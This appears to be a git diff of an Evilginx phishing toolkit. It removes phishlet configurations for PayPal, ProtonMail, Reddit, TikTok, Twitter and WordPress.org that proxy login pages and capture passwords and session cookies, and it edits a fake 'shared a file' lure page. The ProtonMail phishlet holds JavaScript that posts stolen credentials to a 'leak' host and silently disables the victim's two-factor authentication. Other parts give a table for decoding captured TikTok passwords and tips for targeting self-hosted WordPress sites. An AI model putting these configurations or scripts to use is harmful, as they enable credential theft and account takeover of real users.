# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.paypal.com'
|
||||
keys: ['.*,regexp']
|
||||
auth_urls:
|
||||
- '/myaccount/summary'
|
||||
- '/myaccount/.*'
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'login_email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'login_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.paypal.com'
|
||||
path: '/signin'
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.paypal.com"]
|
||||
trigger_paths: ["/signin"]
|
||||
trigger_params: ["email"]
|
||||
script: |
|
||||
function lp(){
|
||||
var email = document.querySelector("#email");
|
||||
if (email != null && password != null) {
|
||||
email.value = "{email}";
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
@ -1,163 +0,0 @@
|
||||
name: 'protonmail'
|
||||
author: '@jamescullum'
|
||||
# This phishlet is mostly an appeal to introduce U2F everywhere, protecting users from phishing in an easy and accessible way.
|
||||
# Protonmail is based on Angular, very JS heavy and changes a lot of things often. This makes it difficult to keep the script compatible for a long period of time.
|
||||
# It never sends the password over the wire and enforces integrity over multiple ways.
|
||||
# I was unable to reconstruct a 2FA session with cookies or other clearly available materials (if you can, tell me how and the whole thing will be MUCH smoother!)
|
||||
# To combat these JS based protections, this phishlet is injecting javascript that holes out the protections.
|
||||
# If the user has no 2FA protection, it will recognize this and leak the login details manually, so that they can be captured.
|
||||
# If 2FA is enabled, it will modify the UI in a way so that the user is forced to disable 2FA. Only after this is done, the credentials are leaked.
|
||||
# This way, only the login details are needed to get into an account.
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'protonmail.com', session: true, is_landing: true, auto_filter:true}
|
||||
- {phish_sub: 'leak', orig_sub: 'debug', domain: 'example.org', session: true, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: '</script></body>', replace: '</script><script>!function(){var o=null,t=null,e=150,i=null,a=null;function c(n,o,t,i){if(void 0===i&&(i=0,a=n),a!=n)return console.error("Waiting aborted due to race condition",a,n);jQuery(n).length?o(i):i<e?setTimeout(function(){c(n,o,t,i+1)},100):(console.error("Timeout reached, cancelling action"),void 0!==t&&t(i))}function l(){null!=i&&clearInterval(i),$("a.headerSecuredDesktop-logo").click(),$("#suppressModal").remove(),$("#pm_loading").removeClass("show")}function s(){var n="https://"+window.location.hostname.replace("//mail.","//leak.")+"/confirm-compromise";$.post(n,{username:o,password:t}),$("html > head").append(''<style id="hide2fa">button[ng-show="twoFactor === 0"] { display: none !important; }</style>'')}!function n(o){window.jQuery?o():setTimeout(function(){n(o)},50)}(function(){$(document).ready(function(){$("body").on("click","#login_btn",function(){o=$("#username").val(),t=$("#password").val(),c("button.compose, #login_btn_2fa:visible",function(){$("#login_btn_2fa").length||s()})}),$("body").on("click","#login_btn_2fa",function(){c("button.compose",function(){$("html > head").append(''<style id="suppressModal">.pm_modal:not(.very-important) { z-index: -1 !important; } .pm_modal.very-important button.close, .pm_modal.very-important button[ng-click="ctrl.cancel()"] { display: none !important; } #body { opacity: 0 !important; }</style>''),$("#pm_loading").addClass("show"),c("#tour-settings",function(){$("#tour-settings").click(),c(''a.navigationSettings-link[href="/security"]'',function(){$(''a.navigationSettings-link[href="/security"]'').click(),c(''button[ng-click="disableTwoFactor()"]'',function(){var n=$(''button[ng-click="disableTwoFactor()"]'');if(n.hasClass("ng-hide"))l();else{i=setInterval(function(){$("#confirmModalBtn").length&&$("#confirmModalBtn").click()},50),n.click();var o=setInterval(function(){$(".cg-notify-message.notification-danger").length&&($(".cg-notify-message.notification-danger").remove(),n.click()),$(".cg-notify-message.notification-success").length&&($(".cg-notify-message.notification-success").remove(),clearInterval(o),l(),s())},100)}},l)},l)},l)})})})})}();</script></body>', mimes: ['text/html']}
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: ' integrity=(.+?) crossorigin=anonymous', replace: ' ', mimes: ['text/html']}
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: '(?:r&&\()?\w+\.integrity\s*=\s*.+?\)?,', replace: '', mimes: ['application/javascript']}
|
||||
auth_urls:
|
||||
- '/confirm-compromise'
|
||||
auth_tokens:
|
||||
# We actually don't care for the cookies here
|
||||
- domain: '.protonmail.com'
|
||||
keys: ['Session-Id']
|
||||
credentials:
|
||||
username:
|
||||
key: 'username'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'mail.protonmail.com'
|
||||
path: '/login'
|
||||
|
||||
# Below you find the raw script. It is minified via jscompress.com and injected at the end of the body of the landing page.
|
||||
#(function() {
|
||||
# var usrCache = null;
|
||||
# var passwdCache = null;
|
||||
# var timeoutMax = 15*10;
|
||||
# var waitforTimeout = null;
|
||||
# var suppressConfirm = null;
|
||||
# var waitingForElement = null;
|
||||
#
|
||||
# defer(function() {
|
||||
# $(document).ready(function() {
|
||||
# $("body").on("click", "#login_btn", function() {
|
||||
# usrCache = $("#username").val();
|
||||
# passwdCache = $("#password").val();
|
||||
#
|
||||
# waitFor("button.compose, #login_btn_2fa:visible", function() {
|
||||
# if($("#login_btn_2fa").length) return;
|
||||
#
|
||||
# leakCredentials();
|
||||
# });
|
||||
# });
|
||||
#
|
||||
# $("body").on("click", "#login_btn_2fa", function() {
|
||||
# waitFor("button.compose", function() {
|
||||
# // Cover actions
|
||||
# $('html > head').append('<style id="suppressModal">.pm_modal:not(.very-important) { z-index: -1 !important; } .pm_modal.very-important button.close, .pm_modal.very-important button[ng-click="ctrl.cancel()"] { display: none !important; } #body { opacity: 0 !important; }</style>');
|
||||
# $("#pm_loading").addClass("show");
|
||||
#
|
||||
# // Navigate to settings
|
||||
# waitFor("#tour-settings", function() {
|
||||
# $("#tour-settings").click();
|
||||
#
|
||||
# // Navigate to security settings
|
||||
# waitFor('a.navigationSettings-link[href="/security"]', function() {
|
||||
# $('a.navigationSettings-link[href="/security"]').click();
|
||||
#
|
||||
# // Wait until 2FA options loaded
|
||||
# waitFor('button[ng-click="disableTwoFactor()"]', function() {
|
||||
# var twofaDisableButton = $('button[ng-click="disableTwoFactor()"]');
|
||||
#
|
||||
# if(!twofaDisableButton.hasClass("ng-hide")) {
|
||||
# // Start automatic modal interactions
|
||||
# suppressConfirm = setInterval(function() {
|
||||
# if($("#confirmModalBtn").length) $("#confirmModalBtn").click();
|
||||
# }, 50);
|
||||
#
|
||||
# // Initiate action to remove
|
||||
# twofaDisableButton.click();
|
||||
#
|
||||
# var waitConfirm = setInterval(function() {
|
||||
# // Wrong code or other error -> Retry
|
||||
# if($(".cg-notify-message.notification-danger").length) {
|
||||
# $(".cg-notify-message.notification-danger").remove();
|
||||
# twofaDisableButton.click();
|
||||
# }
|
||||
#
|
||||
# // Button switched
|
||||
# if($('.cg-notify-message.notification-success').length) {
|
||||
# $(".cg-notify-message.notification-success").remove();
|
||||
# clearInterval(waitConfirm);
|
||||
#
|
||||
# resetUI();
|
||||
# leakCredentials();
|
||||
# }
|
||||
# }, 100);
|
||||
# } else {
|
||||
# resetUI(); // we shouldn't possibly get here
|
||||
# }
|
||||
# }, resetUI);
|
||||
# }, resetUI);
|
||||
# }, resetUI);
|
||||
# });
|
||||
# });
|
||||
# });
|
||||
# });
|
||||
#
|
||||
# function waitFor(selector, callback, timeout_callback, timeout_i) {
|
||||
# if(typeof timeout_i == 'undefined') {
|
||||
# timeout_i = 0;
|
||||
# waitingForElement = selector;
|
||||
# }
|
||||
#
|
||||
# // Collision detection - there should only be one wait at a time, but at login the user might be faster than the timeout
|
||||
# if(waitingForElement != selector) {
|
||||
# return console.error("Waiting aborted due to race condition", waitingForElement, selector);
|
||||
# }
|
||||
#
|
||||
# if (jQuery(selector).length) {
|
||||
# callback(timeout_i);
|
||||
# } else if(timeout_i < timeoutMax) {
|
||||
# waitforTimeout = setTimeout(function() {
|
||||
# waitFor(selector, callback, timeout_callback, timeout_i+1);
|
||||
# }, 100);
|
||||
# } else {
|
||||
# console.error("Timeout reached, cancelling action");
|
||||
#
|
||||
# if(typeof timeout_callback !== 'undefined') {
|
||||
# timeout_callback(timeout_i);
|
||||
# }
|
||||
# }
|
||||
# }
|
||||
#
|
||||
# function resetUI() {
|
||||
# if(suppressConfirm != null) clearInterval(suppressConfirm);
|
||||
#
|
||||
# $("a.headerSecuredDesktop-logo").click();
|
||||
# $("#suppressModal").remove();
|
||||
# $("#pm_loading").removeClass("show");
|
||||
# }
|
||||
#
|
||||
# function leakCredentials() {
|
||||
# var leakAddress = "https://"+(window.location.hostname.replace("//mail.", "//leak."))+"/confirm-compromise";
|
||||
# $.post(leakAddress, {"username":usrCache, "password":passwdCache});
|
||||
#
|
||||
# // Make sure the user doesn't activate 2FA
|
||||
# $('html > head').append('<style id="hide2fa">button[ng-show="twoFactor === 0"] { display: none !important; }</style>');
|
||||
# }
|
||||
#
|
||||
# function defer(method) {
|
||||
# if (window.jQuery) {
|
||||
# method();
|
||||
# } else {
|
||||
# setTimeout(function() { defer(method) }, 50);
|
||||
# }
|
||||
# }
|
||||
#})();
|
@ -1,29 +0,0 @@
|
||||
author: '@customsync'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
auth_tokens:
|
||||
- domain: '.reddit.com'
|
||||
keys: ['reddit_session']
|
||||
credentials:
|
||||
username:
|
||||
key: 'username'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.reddit.com'
|
||||
path: '/login'
|
@ -1,95 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# All Post Requests Fields Get Encoded During Requests to Server By titok javascripts.
|
||||
# Below is the Table Which You can use to decode your captured credentials in evilginx manually.
|
||||
|
||||
author: '@An0nUD4Y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false}
|
||||
- {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.tiktok.com'
|
||||
keys: ['.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'account'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'pass'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
custom:
|
||||
key: 'mobile'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.tiktok.com'
|
||||
path: '/login/phone-or-email/phone-password?lang=en'
|
||||
|
||||
|
||||
#Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding.
|
||||
|
||||
#ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER
|
||||
|
||||
# FOR NUMBERS
|
||||
|
||||
# 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c
|
||||
|
||||
# FOR SPECIAL CHARACTERS
|
||||
|
||||
# ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e
|
||||
|
||||
# FOR LETTERS (SMALL-LETTERS)
|
||||
|
||||
# a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f
|
||||
|
||||
# FOR LETTERS (CAPITAL-LETTERS)
|
||||
|
||||
# A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f
|
||||
|
||||
|
||||
# OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS.
|
||||
|
@ -1,25 +0,0 @@
|
||||
author: '@white_fi'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: 'twitter.com'
|
||||
keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session\[username_or_email\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session\[password\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'mobile.twitter.com'
|
||||
path: '/login'
|
@ -1,22 +0,0 @@
|
||||
author: '@white_fi'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.twitter.com'
|
||||
keys: ['kdt','_twitter_sess','twid','auth_token']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session\[username_or_email\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session\[password\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'twitter.com'
|
||||
path: '/login'
|
@ -1,96 +0,0 @@
|
||||
# Evilginx phishlet configuration file for WordPress.org.
|
||||
#
|
||||
# This is a phishing configuration for the main WordPress.org domain,
|
||||
# it is *not* immediately useful for phishing self-hosted sites that
|
||||
# run on the WordPress software.
|
||||
#
|
||||
# For such self-hosted sites, some modifications are needed. Refer to
|
||||
# the comments in this file for some guidance on creating a phishlet
|
||||
# to use against self-hosted WordPress sites.
|
||||
---
|
||||
name: 'WordPress.org'
|
||||
author: '@meitar'
|
||||
min_ver: '2.3.0'
|
||||
|
||||
proxy_hosts:
|
||||
# Proxy the primary domain.
|
||||
- phish_sub: ''
|
||||
orig_sub: ''
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: true
|
||||
|
||||
# These proxied should be removed when phishing self-hosted sites.
|
||||
- phish_sub: 'login'
|
||||
orig_sub: 'login'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
- phish_sub: 'make'
|
||||
orig_sub: 'make'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
- phish_sub: 'profiles'
|
||||
orig_sub: 'profiles'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
|
||||
sub_filters: []
|
||||
|
||||
# For self-hosted WordPress sites, you may find it easier to use a
|
||||
# regular expression to match session cookies, as the cookie names
|
||||
# are produced unqiely per-site. This can be done as follows:
|
||||
#
|
||||
# ```yaml
|
||||
# - domain: 'self-hosted-domain.com'
|
||||
# keys:
|
||||
# - 'wordpress_sec_.*,regexp'
|
||||
# - 'wordpress_logged_in_.*,regexp'
|
||||
# ```
|
||||
#
|
||||
# If you do choose to use the regular expression facility, you
|
||||
# will also then need to use the `auth_urls` dictionary to define
|
||||
# when Evilginx should actually capture these tokens. Something
|
||||
# like this should do the trick:
|
||||
#
|
||||
# ```yaml
|
||||
# auth_urls:
|
||||
# - '.*/wp-admin/.*'
|
||||
# ```
|
||||
#
|
||||
# The above ensures that the `auth_tokens` are noticed whenever
|
||||
# the phished user makes requests to URLs containing `wp-admin`.
|
||||
#
|
||||
# For the WordPress.org service itself, however, none of the above is
|
||||
# necessary, and the following simple `auth_tokens` dictionary should
|
||||
# work just fine.
|
||||
auth_tokens:
|
||||
- domain: '.wordpress.org'
|
||||
keys: ['wporg_logged_in', 'wporg_sec']
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'log'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'pwd'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
# For a self-hosted WordPress site, you'll probably want to define the
|
||||
# `login` dictionary here as follows:
|
||||
#
|
||||
# ```yaml
|
||||
# login:
|
||||
# domain: 'self-hosted-domain.com'
|
||||
# path: '/wp-login.php'
|
||||
# ```
|
||||
#
|
||||
# Some WordPress plugins, such as WooCommerce, change the URL of the
|
||||
# login page. You'll want to examine the specific site for this.
|
||||
login:
|
||||
domain: 'login.wordpress.org'
|
||||
path: '/'
|
@ -9,7 +9,7 @@
|
||||
<style>
|
||||
|
||||
body {
|
||||
background-color: #666;
|
||||
background-color: #28a745;
|
||||
}
|
||||
|
||||
#box {
|
||||
@ -41,10 +41,10 @@
|
||||
<body>
|
||||
<div id="box">
|
||||
<div class="message">
|
||||
<p><strong>{from_name}</strong> shared a file with you.</p>
|
||||
<p><strong>{from_name}</strong><br/>shared a file with you.</p>
|
||||
</div>
|
||||
<div class="download">
|
||||
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download "{filename}"</button>
|
||||
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download <strong>{filename}</strong></button>
|
||||
</div>
|
||||
</div>
|
||||
|
1
vendor/github.com/caddyserver/certmagic/.gitignore
generated
vendored
Normal file
1
vendor/github.com/caddyserver/certmagic/.gitignore
generated
vendored
Normal file
@ -0,0 +1 @@
|
||||
_gitignore/
|
201
vendor/github.com/caddyserver/certmagic/LICENSE.txt
generated
vendored
Normal file
201
vendor/github.com/caddyserver/certmagic/LICENSE.txt
generated
vendored
Normal file
@ -0,0 +1,201 @@
|
||||
Apache License
|
||||
Version 2.0, January 2004
|
||||
http://www.apache.org/licenses/
|
||||
|
||||
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||
|
||||
1. Definitions.
|
||||
|
||||
"License" shall mean the terms and conditions for use, reproduction,
|
||||
and distribution as defined by Sections 1 through 9 of this document.
|
||||
|
||||
"Licensor" shall mean the copyright owner or entity authorized by
|
||||
the copyright owner that is granting the License.
|
||||
|
||||
